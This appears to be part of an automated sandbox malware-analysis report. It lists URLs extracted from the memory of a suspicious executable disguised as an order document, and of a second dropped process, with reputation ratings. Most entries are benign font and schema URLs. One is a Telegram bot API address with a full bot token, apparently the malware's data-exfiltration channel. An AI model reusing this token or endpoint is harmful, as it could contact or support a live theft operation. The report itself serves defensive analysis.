                                  http://www.ascendercorp.com/typedesigners.htmlORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fonts.comORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sandoll.co.krORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cnORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sakkal.comORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comF.ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.comR.TTFORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.comORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.galapagosdesign.com/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comKORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/FLORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.comFORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/TORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.come.comQOORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/KORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.comtoORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/jp/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comdORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comonyTORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn/ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301420395.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301223897.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301313763.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301537024.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301444783.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301460866.0000000005F10000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300897558.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300940819.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-user.htmlORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
